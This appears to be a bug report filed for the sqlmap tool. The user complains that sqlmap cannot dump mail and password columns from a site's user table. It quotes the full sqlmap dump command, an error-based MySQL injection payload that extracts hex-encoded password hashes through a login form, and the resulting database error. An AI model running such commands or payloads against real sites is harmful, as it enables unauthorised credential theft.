error-based false #231
Description
i used sqlmap test sql vulnerable on my site but sqlmap can't dump data
--random-agent -u xyz --data="submits=+ssssss+&username=l*&password=&x=45&y=7" -D ht_db -T en_users -C mail,password --dump --no-cast --hex -v 3
i test with live header on firefox with sqlmap syntax 👍
post : xyz?md=login
data: submits=+ssssss+&username=l' AND (SELECT 9275 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 82,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EBZd'='EBZd&password=&x=35&y=16
and respond :
MySQL Error
Message: MySQL Query Error
SQL: select count(username) as counts from en_users where username='l' AND (SELECT 6076 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 49,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lyfN'='lyfN' and password='d41d8cd98f00b204e9800998ecf8427e' and ch=1
Error: Unknown column 'mail' in 'order clause'
Errno.: 1054
seem "order by" can't use in case , pls fix it
tks